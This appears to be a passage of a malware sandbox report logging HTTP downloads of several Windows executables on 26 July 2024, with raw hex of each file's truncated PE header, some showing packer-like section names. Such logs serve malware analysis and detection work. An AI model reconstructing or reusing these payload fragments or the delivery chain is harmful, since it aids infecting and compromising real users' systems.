00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 18:09:12 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 18:09:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 18:09:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 18:09:17 GMTContent-Type: application/octet-streamContent-Length: 1898496Last-Modified: Fri, 26 Jul 2024 17:32:44 GMTConnection: keep-aliveETag: "66a3ddbc-1cf800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 40 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 d0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4b 00 00 04 00 00 f0 a2 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c bb 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc ba 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 7a 65 71 62 78 65 73 00 e0 19 00 00 e0 30 00 00 de 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 67 67 68 75 6f 7a 63 00 10 00 00 00 c0 4a 00 00 04 00 00 00 d2 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 4a 00 00 22 00 00 00 d6 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 18:09:19 GMTContent-Type: application/octet-streamContent-Length: 1909760Last-Modified: Fri, 26 Jul 2024 17:32:08 GMTConnection: keep-aliveETag: "66a3dd98-1d2400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 10 41 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 f0 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 4c 00 00 04 00 00 e7 3a 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 da 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e4 d9 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2b 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 73 6f 72 69 69 6a 74 00 10 1a 00 00 d0 31 00 00 0c 1a 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 6d 66 75 77 6a 67 62 00 10 00 00 00 e0 4b 00 00 04 00 00 00 fe 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 4b 00 00 22 00 00 00 02 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 18:10:05 GMTContent-Type: application/octet-streamContent-Length: 250880Last-Modified: Fri, 26 Jul 2024 17:47:55 GMTConnection: keep-aliveETag: "66a3e14b-3d400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 40 67 94 73 04 06 fa 20 04 06 fa 20 04 06 fa 20 6b 70 51 20 1f 06 fa 20 6b 70 64 20 14 06 fa 20 6b 70 50 20 60 06 fa 20 0d 7e 69 20 0f 06 fa 20 04 06 fb 20 76 06 fa 20 6b 70 55 20 05 06 fa 20 6b 70 60 20 05 06 fa 20 6b 70 67 20 05 06 fa 20 52 69 63 68 04 06 fa 20 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 7b ca c8 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 1c 02 00 00 78 03 02 00 00 00 00 c9 20 00 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 05 02 00 04 00 00 52 40 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 58 02 00 78 00 00 00 00 c0 04 02 08 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 59 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 53 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 1a 02 00 00 10 00 00 00 1c 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c0 32 00 00 00 30 02 00 00 34 00 00 00 20 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 2e 02 02 00 70 02 00 00 dc 00 00 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 78 69 70 65 77 61 76 d3 02 00 00 00 a0 04 02 00 04 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 67 61 74 61 00 00 00 00 04 00 00 00 b0 04 02 00 04 00 00 00 34 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 9a 00 00 00 c0 04 02 00 9c 00 00 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 18:10:08 GMTContent-Type: application/octet-streamContent-Length: 91648Last-Modified: Fri, 26 Jul 2024 17:31:31 GMTConnection: keep-aliveETag: "66a3dd73-16600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 62 05 40 5d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 0c 01 00 00 56 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 01 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 71 01 00 c8 00 00 00 00 90 01 00 9c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 74 01 00 2c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00 f0 37 00 00 00 10 00 00 00 38 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 